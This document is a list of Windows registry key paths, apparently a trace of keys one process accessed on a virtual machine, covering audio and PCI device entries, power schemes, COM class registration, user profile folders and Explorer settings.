HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\ConfigFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_293E&SUBSYS_11001AF4&REV_03\3&267a616a&1&20
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\PCI\VEN_8086&DEV_293E&SUBSYS_11001AF4&REV_03\3&267a616a&1&20\Capabilities
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\SecurityDescriptors\ActivePowerScheme
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Power\User\PowerSchemes
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\ActivePowerScheme
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\SecurityDescriptors\381b4222-f694-41f0-9685-ff5bb260df2e
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\SecurityDescriptors\94ac6d29-73ce-41a6-809f-6363ba21b47e
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\381b4222-f694-41f0-9685-ff5bb260df2e
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\381b4222-f694-41f0-9685-ff5bb260df2e\238c9fa8-0aad-41ed-83f4-97be242c8f20
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\238c9fa8-0aad-41ed-83f4-97be242c8f20
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20\94ac6d29-73ce-41a6-809f-6363ba21b47e
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20\94AC6D29-73CE-41A6-809F-6363BA21B47E\DefaultPowerSchemeValues
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20\94AC6D29-73CE-41A6-809F-6363BA21B47E\DefaultPowerSchemeValues\381b4222-f694-41f0-9685-ff5bb260df2e
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20\94AC6D29-73CE-41A6-809F-6363BA21B47E\DefaultPowerSchemeValues\381b4222-f694-41f0-9685-ff5bb260df2e\ACSettingIndex
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20\94AC6D29-73CE-41A6-809F-6363BA21B47E\ValueMin
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20\94AC6D29-73CE-41A6-809F-6363BA21B47E\1
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20\94AC6D29-73CE-41A6-809F-6363BA21B47E\1\SettingValue
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\SecurityDescriptors\a7066653-8d6c-40a8-910e-a1f54b84c7e5
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\381b4222-f694-41f0-9685-ff5bb260df2e\4f971e89-eebd-4455-a8de-9e59040e7347
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\4f971e89-eebd-4455-a8de-9e59040e7347
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\4f971e89-eebd-4455-a8de-9e59040e7347\a7066653-8d6c-40a8-910e-a1f54b84c7e5
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\4f971e89-eebd-4455-a8de-9e59040e7347\A7066653-8D6C-40A8-910E-A1F54B84C7E5\DefaultPowerSchemeValues
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\4f971e89-eebd-4455-a8de-9e59040e7347\A7066653-8D6C-40A8-910E-A1F54B84C7E5\DefaultPowerSchemeValues\381b4222-f694-41f0-9685-ff5bb260df2e
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\4f971e89-eebd-4455-a8de-9e59040e7347\A7066653-8D6C-40A8-910E-A1F54B84C7E5\DefaultPowerSchemeValues\381b4222-f694-41f0-9685-ff5bb260df2e\ACSettingIndex
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\4f971e89-eebd-4455-a8de-9e59040e7347\A7066653-8D6C-40A8-910E-A1F54B84C7E5\ValueMin
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\4f971e89-eebd-4455-a8de-9e59040e7347\A7066653-8D6C-40A8-910E-A1F54B84C7E5\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerSettings\4f971e89-eebd-4455-a8de-9e59040e7347\A7066653-8D6C-40A8-910E-A1F54B84C7E5\0\SettingValue
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{47a0046c-d161-11f0-81ab-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\#
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{47a0046c-d161-11f0-81ab-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{47a0046c-d161-11f0-81ab-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{47a0046c-d161-11f0-81ab-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\#
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{47a0046c-d161-11f0-81ab-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\##?#STORAGE#Volume#{47a0046c-d161-11f0-81ab-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\DeviceDesc
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Control Panel\International
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Control Panel\International\LocaleName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\HDAUDIO\FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001\4&39b8af29&0&0001\Properties\{b3f8fa53-0004-438e-9003-51a46e139bfc}\00000007\00000000\Data
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994ad04-93ef-11d0-a3cc-00a0c9223196}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#elineoutwave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutWave\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutWave\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{eb115ffc-10c8-4964-831d-6dcb02e6f23f}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#elineoutwave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\DeviceInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eLineOutWave\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{eb115ffc-10c8-4964-831d-6dcb02e6f23f}\#eLineOutWave\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{EB115FFC-10C8-4964-831D-6DCB02E6F23F}\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#hdaudio#func_01&ven_1af4&dev_0022&subsys_1af40022&rev_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#elineouttopo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Control
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Control\Linked
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineInTopo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineInWave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39b8af29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutWave
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutTopo\Properties\{840b8171-b0ad-410f-8581-cccc0382cfef}\00000000\00000000\Data
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{6994AD04-93EF-11D0-A3CC-00A0C9223196}\##?#HDAUDIO#FUNC_01&VEN_1AF4&DEV_0022&SUBSYS_1AF40022&REV_1001#4&39B8AF29&0&0001#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\#eLineOutWave\Properties
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Power\PowerRequestOverride
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Power\PowerRequestOverride
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Power\PowerRequestOverride\Driver
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000_CLASSES\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\Progid
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\ProgID\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\AppID
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000_CLASSES\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LocalService
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\DllSurrogate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RunAs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ActivateAtStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\ROTFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AppIDFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LaunchPermission
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\LegacyAuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole\LegacyImpersonationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\AuthenticationLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\RemoteServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\SRPTrustLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\PreferredServerBitness
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AppID\{F9717507-6651-4EDB-BFF7-AE615179BCCF}\LoadUserSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{c39ee728-d419-4bd4-a3ef-eda059dbd935}\Elevation
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2476309959-3960023044-3115063449-1000
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2476309959-3960023044-3115063449-1000\ProfileImagePath
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Environment
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Volatile Environment
HKEY_USERS\S-1-5-21-2476309959-3960023044-3115063449-1000\Volatile Environment\0
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{031E4825-7B94-4DC3-B131-E946B44C8DD5}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{35786D3C-B075-49b9-88DD-029876E11C01}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{35786D3C-B075-49b9-88DD-029876E11C01}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{640167b4-59b0-47a6-b335-a6b3c0695aea}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{640167b4-59b0-47a6-b335-a6b3c0695aea}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{9113A02D-00A3-46B9-BC5F-9C04DADDD5D7}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{9113A02D-00A3-46B9-BC5F-9C04DADDD5D7}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{b155bdf8-02f0-451e-9a26-ae317cfd7779}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\{b155bdf8-02f0-451e-9a26-ae317cfd7779}\SuppressionPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\MyComputer\NameSpace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\MyComputer\NameSpace\DelegateFolders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Segoe UI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Max Cached Icons
HKEY_CURRENT_USER\Control Panel\Desktop\SmoothScroll
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\TaskbarAnimations
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\EnableBalloonTips
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ListviewAlphaSelect
